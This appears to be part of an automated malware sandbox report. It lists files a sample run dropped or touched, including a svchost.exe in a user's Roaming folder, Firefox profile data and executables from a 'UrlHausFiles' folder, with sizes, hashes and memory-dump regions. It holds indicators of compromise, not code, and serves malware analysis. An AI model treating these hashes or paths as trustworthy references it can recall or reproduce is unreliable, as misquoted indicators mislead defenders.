369b4e34eeb47909a20d58c75346c876a7a6cf2562ff40668044e48c9af92f76a911b8e04e82eb4a2951efcaee50b96e5ddb1e2d42af8c32d01a3102f14d6523

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\prefs-1.js

Filesize
10KB

MD5
82a91dc421e30b7f2c50b1d77291bd43

SHA1
d33f12ad759d12de7a35f80fb85a9bd662b16e20

SHA256
b5ba27027b679ad68dedd6350d0069d6ed6060302bcc43d25edb106151f18d08

SHA512
8199b6571f1bcb1cc6a83b6cf752077275e08db4bc01610f4908692ff52ddf847ec54b49edc2c64613cb0b1275939ae149ecd8aab976d66d469916af813f1c05

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\sessionstore-backups\recovery.baklz4

Filesize
10KB

MD5
3ff558b2aab9e53992e136e1b119e80d

SHA1
32fc9d06463b2300b356eda4a6c09faa4a015574

SHA256
f9a2920e4120409d319e550500b92d903e7b4bb42446e85d214d33670c5cd0f4

SHA512
92f8b116e0814df2f4ae6cab1ec2817b70c0106e1c29d8a0b02b6c6997d5dd454f4169c2ea2884043da3b3a846831ccf7d5e99ef52f6b304d348ef7747592e6b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\sessionstore-backups\recovery.baklz4

Filesize
10KB

MD5
5a6faebbb282d48e448be1e915004b86

SHA1
2822b0b8b76d0805eeebe704558cef392a4ec271

SHA256
99f8ebb025f01dbdc6a454cf57617936139adf1a270b28b8a591167b9cecb6b3

SHA512
edee395676dbf1f69e888b3e7324fd1140d1553c6a2eb1d0638c517f118c35fc1a51024e1bf603009e258f21469159851b4ebeee8228b53b98594923c5a7f76a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\sessionstore-backups\recovery.baklz4

Filesize
10KB

MD5
0a3953ec68c442f125a1b4e25bfd471e

SHA1
670ebbf784f0e7d7a0360e2ec508422eb7012e5a

SHA256
5f56161b6c268e1a3569794589706a1d5dbf9fb1922687b6452a5ae035b29232

SHA512
c31b84c9b2e520375e60843aca56dc274074fb3ff9e4d0a295bba543682b3520e7c1fc98c2f31df3bde3cef3c1c3fdc496a73b6da840b4f1c4db401f75e864ee

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\y0bypz8z.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
368KB

MD5
30d5149fc2bd8a3f885dc92af509f046

SHA1
0674b231fa13f330915c50c567e018cf11a804cc

SHA256
99df754b6d415d8f0a88bc0d5db45e8a6e930d56b531d0a0f4deb5657300929d

SHA512
599726c761a424a33371b5d31e6d9a715c597bab37e145e64f89bcbd43f5245f28c2417e854568d5f01dc3af0bcfceafc5093bfebf422ed2b4f200d561545c89

Download Submit
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

Filesize
8B

MD5
cf759e4c5f14fe3eec41b87ed756cea8

SHA1
c27c796bb3c2fac929359563676f4ba1ffada1f5

SHA256
c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761

SHA512
c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

Download Submit
C:\Users\Admin\AppData\Roaming\svchost.exe

Filesize
23KB

MD5
2697c90051b724a80526c5b8b47e5df4

SHA1
749d44fe2640504f15e9bf7b697f1017c8c2637d

SHA256
f8b23a264f58e9001e087af2bf48eed5938db31b5b1b20d973575cfa6a121355

SHA512
d0c8d76699f2f88d76eeaf211e59a780969b7692b513495a34013af8380d3fe0616caf03c6e47b8e7721d2f0a369c1dd20860b755b7d607783a99080c5f5315b

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 554362.crdownload

Filesize
2KB

MD5
f67c8aafd1691c07e7416053a1ed68a9

SHA1
46d906a867a2932a4963f0f6c811d29332567943

SHA256
8a41bc92d1f123af5ae247721306d649be344f8298292f8afb597bb3c60b247c

SHA512
39b54e7217240a84a538bcb1926f9da7dbbad7a6a389515eb40c156ead0ed90f196c07f756e4fad0f2b41057907884c4375d73b7fb62e3c7571e914d7bd477f3

Download Submit
C:\Users\Admin\Downloads\UrlHausFiles\Loader.exe

Filesize
63KB

MD5
aba726ec9183c855cfa084ee66f49f7f

SHA1
f12f9cf0920b0d3a76bb16027539ba0c13da035d

SHA256
fb680425e6edc0fa4d2fe526cd78d6ec69683fcafe57744993c8b7192b2c0a71

SHA512
a03a1c596e9570c6766d051d76e1a14894852cfa3889dd567f9e187be1055a49479355b8ed3a876a2934308aac945b232c1b206664614b66791ed0cc1f0b5c1f

Download Submit
C:\Users\Admin\Downloads\UrlHausFiles\Photo.scr

Filesize
1.5MB

MD5
aba2d86ed17f587eb6d57e6c75f64f05

SHA1
aeccba64f4dd19033ac2226b4445faac05c88b76

SHA256
807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d

SHA512
c3f276820d6b2872c98fa36c7b62f236f9f2650b344a243a30dcda9ca08726f6ce27c5c380b4256a1a7d8d4309e1f2f270f10bad18099a8c9e1835925ea51806

Download Submit
C:\Users\Admin\Downloads\UrlHausFiles\Photo.scr

Filesize
6.0MB

MD5
a20727b81b50a20483ba59ae65443dfe

SHA1
7429f81064e044e981de12bde015117953b7b0e7

SHA256
af94ddf7c35b9d9f016a5a4b232b43e071d59c6beb1560ba76df20df7b49ca4c

SHA512
c6b857207818f1e26065ac424ee5cfdb18e5297ae8c1724a5ec8e80cf96b43bcd31b479859fa863ff508030ce52c60870152b433d548df9fbfc42a378c499856

Download Submit
C:\Users\Admin\Downloads\UrlHausFiles\Tutorial.exe

Filesize
7KB

MD5
07edde1f91911ca79eb6088a5745576d

SHA1
00bf2ae194929c4276ca367ef6eca93afba0e917

SHA256
755d0128ec5a265f8fe25fa220925c42171682801aa0160707ffc39719270936

SHA512
8ed0362290199a6e5b45dc09061a06112eae9a68bea11241a31e330be5ca83a5936f64e1139c33159c91e87320a20904891b3e48802626b809d6b37001c425e7

Download Submit
C:\Users\Admin\Downloads\UrlHausFiles\aa.exe

Filesize
74KB

MD5
447523b766e4c76092414a6b42080308

SHA1
f4218ea7e227bde410f5cbd6b26efd637fc35886

SHA256
3e7eb033eaf54c89f14d322597e377be7fd69f9c300f5be0e670b675d2a1a568

SHA512
98b68c743d8aab5b9cb0aad2331ab24673e425fbe68ad0ede2f3aafc1394879f8a05c7db5393b3ef3b8c2d21674a35f90c275558f43cdf983d03d995151ec2f9

Download Submit
C:\Users\Admin\Downloads\UrlHausFiles\aidans.dont.run.exe

Filesize
63KB

MD5
9efaf6b98fdde9df4532d1236b60619f

SHA1
5d1414d09d54de16b04cd0cd05ccfc0692588fd1

SHA256
7c8a5e6cf4e451d61157e113f431a1f3e606fba0e7147ffa9a8f429cb60e47d6

SHA512
eabc2c58a7b2d636f13b149199f2dc943c4af3296c5a4605b72293294a449a2ea8da432238748ca2fb69fb944a31ac6fae7e5310cdc57609e5955f62b71e812d

Download Submit
C:\Users\Admin\Downloads\UrlHausFiles\ataturk.exe

Filesize
56KB

MD5
a7b36da8acc804d5dd40f9500277fea9

SHA1
5c80776335618c4ad99d1796f72ebeb53a12a40b

SHA256
b820302d0d553406ab7b2db246c15ac87cb62a8e9c088bda2261fe5906fc3672

SHA512
ee1a8b3fdc049f90c0a4cfe166a7bde04eb6c55a261ad9f9574c995ea782b9e2398ac7028a258ea737aea81326fa3f85e609f3e1510373b9925dc03dcb0dee52

Download Submit
C:\Users\Admin\Downloads\UrlHausFiles\handeltest.exe

Filesize
8KB

MD5
fc58aae64a21beb97e1f8eb000610801

SHA1
d377b4da7d8992b0c00455b88550515369b48c78

SHA256
a9da5745b96d84d4933b62dd790563ecdf59b5cf45009a192e886dc39c80c389

SHA512
601d661020e204565d21a1b7cedc5c081be2a88c226cd7152be6d3ea0ccc72161dcec68026f344028e5409e08178877639d5d6a46564d8e3d68236e484fc03d8

Download Submit
C:\Users\Admin\Downloads\UrlHausFiles\help.scr

Filesize
9.0MB

MD5
a2af48a018c65d34b445bd35bdd1b597

SHA1
76daedc184a0cb9a717fc49f86a57b5baed0a35c

SHA256
d6350d8a664b3585108ee2b6f04f031d478e97a53962786b18e4780a3ca3da60

SHA512
d8def07a8accdb65b6b9dfc3168981b600a78310ec06cb626fcd000e7bcc4627ff5be7fc9f26992838226d84982ddd470d9ac89e041727e72b738a61bec61319

Download Submit
C:\Users\Admin\Downloads\UrlHausFiles\nobody.exe

Filesize
74KB

MD5
4b1b45bb55ccdd4b078459ade3763e6d

SHA1
049344853c902e22e70ae231c669bf0751185716

SHA256
1f06ff3d8f50e6c184beca758aaad63936ad20a056b8ae4c8138d85ccc703a46

SHA512
b95739746df825e83e59b81f11f841d6029f92bebcd46485df456b23ff1c87cbce097d1e695a9f0a2559bcd9960a4f4fc137bca95233fafe95b13ddf5fabad65

Download Submit
C:\Users\Admin\Downloads\UrlHausFiles\output.exe

Filesize
41KB

MD5
a0e598ec98a975405420be1aadaa3c2a

SHA1
d861788839cfb78b5203686334c1104165ea0937

SHA256
e6ac8a6dac77f9873024f50befb293b9cf6347aa2e093cd863b551d9c8da5f8d

SHA512
e5ee500a8dcddd72e727cfa24e51093cd2b088f7ef89089f1d24145baa41c1ac46bf6be73bfd8cb15e2549349da8c2547d4e391b6e3a456621524fe0f83f9585

Download Submit
C:\Users\Admin\Downloads\UrlHausFiles\saloader.exe

Filesize
229KB

MD5
1e10af7811808fc24065f18535cf1220

SHA1
65995bcb862aa66988e1bb0dbff75dcac9b400c7

SHA256
e07fd0ac793b06603be164c9ee73465af512cf17bed07614cbcd2a8410f04eed

SHA512
f1c623918a3701254805e7648d671b316446a0f98637d3de62d44331cf91502afb57ccb762472491bc4ac037fbf5f7b624eb9d39092b3be0b2ed84da6f3acadc

Download Submit
C:\Users\Admin\Downloads\UrlHausFiles\start.exe

Filesize
45KB

MD5
b733e729705bf66c1e5c66d97e247701

SHA1
25eec814abdf1fc6afe621e16aa89c4eb42616b9

SHA256
9081f9cf986ed111d976a07ee26fc2b1b9992301344197d6d3f83fe0d2616023

SHA512
09b59b8942c1409a03ca4e7f77c6007160af4d557386b766516dba392750869c017d0fd5d6fbbfcbb3e559a70ad42adcb498595df186be180cfc04e921d74320

Download Submit
C:\Users\Admin\Downloads\UrlHausFiles\xs.exe

Filesize
56KB

MD5
717f7ee9f178509f07ace113f47bb6d1

SHA1
6ce32babec7538b702d38483ac6031c18a209f96

SHA256
50f7eb886f7d415e9e64875867aeeeaa8ef129f49ceebd271701e53c4f5acd85

SHA512
5ad4328061c67ec4c9db57ff8c56cf048d8b1fe386e554256c720136acd4f9e1d8cb39bc8079ae8ba5eb8d80137bb571ba29ee55bfd22786797445a652d0ef95

Download Submit
C:\Users\Admin\Downloads\WOY7j5Ld.txt.part

Filesize
849B

MD5
61091ec128bdbad1c902981b669ca485

SHA1
205bf98193bd2944c88130dbeb4375ce98934b33

SHA256
5db1d16c21f0419169c62b63fea9e32e7087118cbd9625bf017f0d219363d2ec

SHA512
c8100620099fc8ef9fd00b2068b765a15be065e754a707e3be567e6eb6ab59dba6c4e88b54300dce798327f7a115d1e515ade2d9146844e5cba0eb49b7a6a000

Download Submit
\??\pipe\LOCAL\crashpad_2876_QWYCHMFITYIFMMVU

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/436-1133-0x0000000000800000-0x0000000000810000-memory.dmp

Filesize
64KB

Download
memory/444-1064-0x00000267C0C50000-0x00000267C0C51000-memory.dmp

Filesize
4KB

Download
memory/444-1062-0x00000267C0C50000-0x00000267C0C51000-memory.dmp

Filesize
4KB

Download
memory/444-1061-0x00000267C0C50000-0x00000267C0C51000-memory.dmp

Filesize
4KB

Download
memory/444-1060-0x00000267C0C50000-0x00000267C0C51000-memory.dmp

Filesize
4KB

Download
memory/444-1059-0x00000267C0C50000-0x00000267C0C51000-memory.dmp

Filesize
4KB

Download
memory/444-1063-0x00000267C0C50000-0x00000267C0C51000-memory.dmp

Filesize
4KB

Download
memory/444-1053-0x00000267C0C50000-0x00000267C0C51000-memory.dmp

Filesize
4KB

Download
memory/444-1065-0x00000267C0C50000-0x00000267C0C51000-memory.dmp

Filesize
4KB

Download
memory/444-1054-0x00000267C0C50000-0x00000267C0C51000-memory.dmp

Filesize
4KB

Download
memory/444-1055-0x00000267C0C50000-0x00000267C0C51000-memory.dmp

Filesize
4KB

Download
memory/1376-1218-0x0000000000690000-0x00000000009B4000-memory.dmp

Filesize
3.1MB

Download
memory/1376-1219-0x000000001BF00000-0x000000001BFB2000-memory.dmp

Filesize
712KB

Download
memory/1832-1164-0x000001E0FC170000-0x000001E0FC18E000-memory.dmp

Filesize
120KB

Download
memory/1832-1163-0x000001E0FC190000-0x000001E0FC1E0000-memory.dmp

Filesize
320KB

Download
memory/1832-1215-0x000001E0FC300000-0x000001E0FC4A9000-memory.dmp

Filesize
1.7MB

Download
memory/1832-1130-0x000001E0E1AB0000-0x000001E0E1AF0000-memory.dmp

Filesize
256KB

Download
memory/1832-1196-0x000001E0FC270000-0x000001E0FC27A000-memory.dmp

Filesize
40KB

Download
memory/1832-1197-0x000001E0FC2A0000-0x000001E0FC2B2000-memory.dmp

Filesize
72KB

Download
memory/2080-1042-0x0000000000F10000-0x0000000000F28000-memory.dmp

Filesize
96KB

Download
memory/2636-1114-0x0000000000530000-0x0000000000546000-memory.dmp

Filesize
88KB

Download
memory/2812-1110-0x0000000000630000-0x0000000000644000-memory.dmp

Filesize
80KB

Download
memory/2820-1102-0x0000000005830000-0x000000000583A000-memory.dmp

Filesize
40KB

Download
memory/2820-1101-0x0000000000F20000-0x0000000000F28000-memory.dmp

Filesize
32KB

Download
memory/3056-1094-0x0000000000FC0000-0x0000000000FC8000-memory.dmp

Filesize
32KB

Download
memory/3056-1097-0x0000000005890000-0x000000000589A000-memory.dmp

Filesize
40KB

Download
memory/3056-1096-0x0000000005910000-0x00000000059A2000-memory.dmp

Filesize
584KB

Download
memory/3056-1095-0x0000000005E20000-0x00000000063C4000-memory.dmp

Filesize
5.6MB

Download
memory/3516-1075-0x0000000000FA0000-0x0000000000FB2000-memory.dmp

Filesize
72KB

Download
memory/3516-1086-0x0000000005A00000-0x0000000005A9C000-memory.dmp

Filesize
624KB

Download
memory/4044-1254-0x0000000000400000-0x000000000058C000-memory.dmp

Filesize
1.5MB

Download
memory/4272-264-0x000002A0E0E30000-0x000002A0E0EA6000-memory.dmp

Filesize
472KB

Download
memory/4272-1038-0x000002A0DC7D0000-0x000002A0DC7D8000-memory.dmp

Filesize
32KB

Download
memory/4272-289-0x000002A0DC730000-0x000002A0DC76C000-memory.dmp

Filesize
240KB

Download
memory/4272-248-0x000002A0DBF50000-0x000002A0DBF58000-memory.dmp

Filesize
32KB

Download
memory/4272-258-0x000002A0DDCB0000-0x000002A0DDCD2000-memory.dmp

Filesize
136KB

Download
memory/4272-1066-0x000002A0E52C0000-0x000002A0E5436000-memory.dmp

Filesize
1.5MB

Download
memory/4272-263-0x000002A0DDF80000-0x000002A0DDFA6000-memory.dmp

Filesize
152KB

Download
memory/4272-260-0x000002A0DDC30000-0x000002A0DDC38000-memory.dmp

Filesize
32KB

Download
memory/4272-243-0x000002A0DD9C0000-0x000002A0DD9F8000-memory.dmp

Filesize
224KB

Download
memory/4272-242-0x000002A0C1090000-0x000002A0C109E000-memory.dmp

Filesize
56KB

Download
memory/4272-259-0x000002A0DDC20000-0x000002A0DDC28000-memory.dmp

Filesize
32KB

Download
memory/4272-240-0x000002A0C0BF0000-0x000002A0C0C28000-memory.dmp

Filesize
224KB

Download
memory/4272-241-0x000002A0DD970000-0x000002A0DD9BA000-memory.dmp

Filesize
296KB

Download
memory/4272-262-0x000002A0DDF20000-0x000002A0DDF28000-memory.dmp

Filesize
32KB

Download
memory/4272-288-0x000002A0DC6D0000-0x000002A0DC6E2000-memory.dmp

Filesize
72KB

Download
memory/4272-1067-0x000002A0E5440000-0x000002A0E564A000-memory.dmp

Filesize
2.0MB

Download
memory/4284-1080-0x0000000000480000-0x0000000000494000-memory.dmp

Filesize
80KB

Download
memory/4532-1228-0x0000000000470000-0x0000000000794000-memory.dmp

Filesize
3.1MB

Download
memory/4620-1122-0x00000000001B0000-0x00000000001C6000-memory.dmp

Filesize
88KB

Download
memory/4620-1224-0x00000000005A0000-0x00000000008C4000-memory.dmp

Filesize
3.1MB

Download
memory/4720-1083-0x0000000000220000-0x0000000000238000-memory.dmp

Filesize
96KB

Download
memory/4800-1111-0x0000000000400000-0x000000000058C000-memory.dmp

Filesize
1.5MB

Download
memory/4952-1285-0x000002B2B7CB0000-0x000002B2B7CC4000-memory.dmp

Filesize
80KB

Download
memory/4952-1284-0x00007FF7579D0000-0x00007FF758014000-memory.dmp

Filesize
6.3MB

Download
memory/4952-1410-0x00007FF7579D0000-0x00007FF758014000-memory.dmp

Filesize
6.3MB

Download
memory/5004-1106-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/5196-1420-0x00007FF7579D0000-0x00007FF758014000-memory.dmp

Filesize
6.3MB

Download
memory/5292-1429-0x00007FF7579D0000-0x00007FF758014000-memory.dmp

Filesize
6.3MB

Download
memory/5292-1430-0x00007FF7579D0000-0x00007FF758014000-memory.dmp

Filesize
6.3MB

Download
memory/5292-1436-0x00007FF7579D0000-0x00007FF758014000-memory.dmp

Filesize
6.3MB

Download
memory/5292-1442-0x00007FF7579D0000-0x00007FF758014000-memory.dmp

Filesize
6.3MB

Download
memory/5292-1447-0x00007FF7579D0000-0x00007FF758014000-memory.dmp

Filesize
6.3MB

Download